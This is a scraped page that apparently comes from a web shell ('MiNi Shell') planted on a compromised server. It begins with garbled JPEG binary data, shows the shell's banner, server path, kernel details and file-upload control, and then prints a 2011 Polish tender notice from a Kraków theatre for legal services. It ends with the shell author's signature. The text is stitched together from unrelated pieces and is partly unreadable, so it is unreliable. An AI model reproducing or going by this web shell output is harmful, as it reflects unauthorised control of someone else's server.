JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111010/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111010/266245-N-2011.html

<p class="kh_header"><b>Kraków: Kompleksowa obsługa prawna 
Narodowego Starego Teatru im. H. Modrzejewskiej 
w Krakowie przy ul. Jagiellońskiej 5</b><br>
<b>Numer ogłoszenia: 266245 - 2011; data zamieszczenia: 10.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Stary Teatr im. H. Modrzejewskiej , ul. Jagiellońska 5, 31-010 Kraków, woj. małopolskie, tel. 012 4212977, faks 012 4213353.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stary-teatr.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa prawna 
Narodowego Starego Teatru im. H. Modrzejewskiej 
w Krakowie przy ul. Jagiellońskiej 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa prawna Narodowego Starego Teatru im. H. Modrzejewskiej w Krakowie przy ul. Jagiellońskiej 5

3.1	Przedmiotem niniejszego zamówienia jest wykonywanie przez osoby posiadające uprawnienia radcy prawnego/adwokata usługi polegającej na kompleksowej obsłudze prawnej Narodowego Starego Teatru im. H. Modrzejewskiej przez okres 12 miesięcy  od daty podpisania umowy.
3.2	Wykonawca od dnia zawarcia umowy, zobowiązany będzie do świadczenia pomocy prawnej i zastępstwa procesowego na rzecz Zamawiającego we wskazanych przez Zamawiającego sprawach prawnych pozostających w związku z prowadzoną przez Zamawiającego działalnością.
3.3	Przez pomoc prawną i doradztwo prawne  strony rozumieją : udzielanie porad i konsultacji prawnych, sporządzanie opinii prawnych, sporządzanie pism do stron, reprezentowanie interesów Zamawiającego w postępowaniach.
3.4	Wykonawca będzie pełnił dyżury w siedzibie zamawiającego minimum 8 godzin w tygodniu, w poniedziałki i czwartki, w wymiarze 4 godzin dziennie w godzinach od 10:00 do 14:00. W pozostałym czasie Wykonawca musi być dostępny dla Zamawiającego (w miarę potrzeb) za pośrednictwem środków porozumiewania się na odległość, w tym telefonu, telefaxu, Internetu, a jeśli zaistnieje taka potrzeba również po telefonicznym zawiadomieniu z jednodniowym wyprzedzeniem w siedzibie Zamawiającego lub w innym miejscu na terenie miasta Krakowa, a także po telefonicznym zawiadomieniu z trzydniowym wyprzedzeniem poza miastem Kraków, jeśli Zamawiający uzna za konieczny udział Wykonawcy w spotkaniach i rozmowach toczących się poza miastem Kraków. Czynności związane z reprezentacją Zamawiającego przed sądami, Wykonawca będzie świadczyć w miejscu odbywania się posiedzeń i rozpraw.
3.5	Obsługa prawna winna być świadczona z należytą starannością, zgodnie z właściwymi przepisami prawa i etyki zawodowej. Będzie ona polegać w szczególności na:
1/	pomoc przy opracowywaniu projektów aktów prawnych oraz  wewnętrznych aktów normatywnych (umów, zarządzeń, wewnętrznych regulaminów, instrukcji, itp.) wraz z ich opiniowaniem pod względem prawnym,
2/	recenzowaniu i zatwierdzaniu umów,
3/	bieżącym doradztwie prawnym w sprawach związanych z działalnością Zamawiającego,
4/	sporządzaniu opinii prawnych, analiz, informacji prawnych, interpretacji przepisów, ekspertyz oraz wyjaśnień,
5/	monitorowaniu zgodności wewnętrznych regulacji prawnych z przepisami dot. ochrony danych osobowych oraz przygotowaniu propozycji ewentualnych zmian ,
6/	reprezentowaniu Zamawiającego podczas rokowań z osobami trzecimi i w ramach innych czynności prawnych, w których Zamawiający uzna udział Wykonawcy za wskazany,  w tym zawieraniu ugód pozasądowych,
7/	uczestnictwie w spotkaniach, rozmowach, negocjacjach i pracach grup roboczych, związanych z zagadnieniami prawnymi,  
8/	sporządzaniu pozwów, pism procesowych, apelacji, zażaleń, kasacji w postępowaniach sądowych oraz pism, wniosków, odwołań od decyzji i skarg do sądu administracyjnego w postępowaniach administracyjnych,
9/	przygotowywaniu dokumentacji i propozycji stanowiska w sprawach,
10/	przygotowaniu informacji o przewidywanych zmianach przepisów prawnych dotyczących działalności Zamawiającego oraz istotnych orzeczeniach sądowych,
11/	udzielaniu porad prawnych i konsultacji w siedzibie Zamawiającego w sprawach zgłaszanych przez komórki organizacyjne Zamawiającego,
12/	negocjacjach z dłużnikami,
13/	pozyskiwaniu danych o składnikach majątkowych dłużnika umożliwiających zabezpieczenie i egzekucję wierzytelności Zamawiającego, 
14/	zastępstwie prawnym w sprawach o zabezpieczenie należności Zamawiającego prowadzonych przed wszczęciem postępowania sądowego, w trakcie postępowania sądowego i po jego zakończeniu, 
15/	windykacji zleconych należności,
16/	negocjowaniu warunków umów i porozumień zawieranych przez Zamawiającego,
17/	reprezentacji Zamawiającego przed sądami powszechnymi wszystkich instancji, Sądem Najwyższym, sądami i organami administracyjnymi, organami egzekucyjnymi, urzędami i instytucjami jak również spraw w postępowaniu polubownym oraz przed wszelkimi innymi podmiotami,
18/	udzielanie pomocy prawnej pracownikom Zamawiającego w zakresie wykonywanych przez nich zadań,
19/	uczestnictwo w przygotowaniu i prowadzeniu postępowań dotyczących zamówień publicznych udzielanych przez Zamawiającego
20/	doradztwo prawne przy nawiązywaniu, zmianie i rozwiązywaniu stosunków pracy,
21/	doradztwo w przygotowywaniu umów o pracę, umów o odpowiedzialności materialnej pracownika za mienie powierzone, umów o korzystanie przez pracownika ze sprzętu służbowego, umów o  zakazie konkurencji, umów szkoleniowych (dokształcanie pracownika), przygotowywanie porozumień o przejęciu pracowników, porozumień o zawieszeniu stosowania układu zbiorowego pracy,
22/	współudział w tworzeniu regulaminów pracy,  układów zbiorowych, regulaminów Zakładowego Funduszu Świadczeń Socjalnych i innych,
23/	udział w negocjacjach pomiędzy pracodawcą, a związkami zawodowymi i wypracowywanie wspólnych rozwiązań finalizowanych stosownymi porozumieniami,
24/	przygotowywanie procesu zwolnień grupowych pracowników i nadzór nad jego realizacją,
25/	reprezentacja w sprawach pracowniczych Pracodawcy,
26/	wykonywanie innych czynności wchodzących w zakres zwykłej obsługi prawnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b.	posiadają wiedzę i doświadczenie tzn. wykażą że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej następujące usługi:
1.	dwie usługi polegające na kompleksowej obsłudze prawnej jednostek sektora finansów  publicznych, przez okres minimum 12 miesięcy o przy czym wartość każdej usługi wyniosła minimum 40000 zł,
2.	 usługę polegającą na sporządzeniu opinii z zakresu prawa autorskiego, 
3.	 usługę polegającą na stałej obsłudze prawnej w zakresie zamówień   publicznych, przez okres minimum 12 miesięcy.
na podstawie wykazu wykonanych usług</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c.	dysponują co najmniej dwoma osobami, posiadającymi od co najmniej 36 miesięcy uprawnienia do wykonywania zawodu radcy prawnego lub adwokata potwierdzone wpisem na listę prowadzoną przez właściwą Izbę zawodową. Osoby te muszą posiadać doświadczenie zawodowe obejmujące następujące zagadnienia: prawo pracy, finanse publiczne, prawo autorskie, zamówienia publiczne, prawo budowlane, postępowanie egzekucyjne.
na podstawie wykazu osób oraz oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmianę umowy w przypadku zmiany stawki podatku VAT - VAT będzie naliczany zgodnie ze stawką obowiązującą w dniu wystawienia faktury</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stary-teatr.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kraków. ul.Jagiellońska 5 p. nr 38.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2011 godzina 10:00, miejsce: Kraków. ul. Jagiellońska 5 Sekretariat Teatru.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com